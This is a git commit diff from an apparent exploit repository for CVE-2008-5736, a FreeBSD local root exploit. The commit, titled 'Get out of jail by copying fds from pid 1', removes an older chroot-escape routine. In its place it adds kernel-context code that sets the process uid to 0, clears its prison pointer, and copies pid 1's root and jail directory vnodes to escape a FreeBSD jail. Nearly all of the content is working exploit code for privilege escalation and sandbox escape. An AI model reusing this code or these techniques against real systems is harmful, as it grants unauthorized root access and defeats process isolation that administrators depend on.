diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 03:47:07 -0500 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 03:47:07 -0500 |
| commit | 4c9211d7f685f873aa3ce5796c0f4e63e6b50ddd (patch) | |
| tree | 750df4d44b65d5fad5720b42ca2d416828b94c34 | |
| parent | Don't copy. Just jmp to function. (diff) | |
| download | CVE-2008-5736-4c9211d7f685f873aa3ce5796c0f4e63e6b50ddd.tar.xz CVE-2008-5736-4c9211d7f685f873aa3ce5796c0f4e63e6b50ddd.zip | |
Get out of jail by copying fds from pid 1.
| -rw-r--r-- | current-thread-exec.c | 72 |
1 files changed, 11 insertions, 61 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c index 01f9acc..373f74f 100644 --- a/current-thread-exec.c +++ b/current-thread-exec.c @@ -7,6 +7,8 @@ #include <sys/mman.h> #include <sys/socket.h> #include <sys/stat.h> +#include <sys/filedesc.h> +#include <sys/queue.h> #include <netgraph/ng_socket.h> #include <stdio.h> #include <fcntl.h> @@ -14,64 +16,6 @@ #define PAGES 1 -int leavejail(void) -{ - int fail = 0; - int val = 2; - struct stat dirinfo; - ino_t chroot_root; - if (stat("/", &dirinfo) < 0) { - perror("\t[-] couldn't stat /"); - goto die; - } - chroot_root = dirinfo.st_ino; - if (sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val)) < 0) { - perror("\t[-] couldn't change sysctl"); - goto die; - } - mkdir("temp_dir", 0755); - int fd = open(".", O_RDONLY); - if (fd < 0) { - perror("\t[-] couldn't open this directory"); - goto die; - } - if (chroot("temp_dir") < 0) { - perror("\t[-] couldn't chroot to temp_dir"); - goto die; - } - if (fchdir(fd) < 0) { - perror("\t[-] couldn't change to fd"); - goto die; - } - close(fd); - int i; - for (i = 0; i < 1024; ++i) { - if (chdir("..") < 0) { - perror("\t[-] couldn't chdir backwards"); - goto die; - } - } - if (chroot(".") < 0) { - perror("\t[-] couldn't obtain final chroot"); - goto die; - } - if (stat("/", &dirinfo) < 0) { - perror("\t[-] couldn't stat new /"); - goto die; - } - if (dirinfo.st_ino == chroot_root) { - fprintf(stderr, "\t[-] new root is the same as old root\n"); - goto die; - } -end: - val = 0; - sysctlbyname("kern.chroot_allow_open_directories", NULL, 0, &val, sizeof(val)); - return fail; -die: - close(fd); - fail = 1; - goto end; -} volatile int got_root = 0; int root(void) @@ -84,6 +28,15 @@ int root(void) thread->td_critnest = 0; thread->td_proc->p_ucred->cr_uid = 0; thread->td_proc->p_ucred->cr_prison = NULL; + + struct proc *parent = thread->td_proc; + while (parent->p_pptr && parent->p_pid != 1) + parent = parent->p_pptr; + thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir; + thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir; + thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir; + thread->td_proc->p_pptr = parent; + got_root = 1; return 0; } @@ -123,9 +76,6 @@ int main(int argc, char *argv[]) fprintf(stderr, "[+] elevating permissions\n"); setuid(0); setgid(0); - fprintf(stderr, "[+] attempting to leave jail...\n"); - if (leavejail()) - fprintf(stderr, "[-] failed to leave jail\n"); if (getuid() != 0) { fprintf(stderr, "[-] failed to get root\n"); return -1; |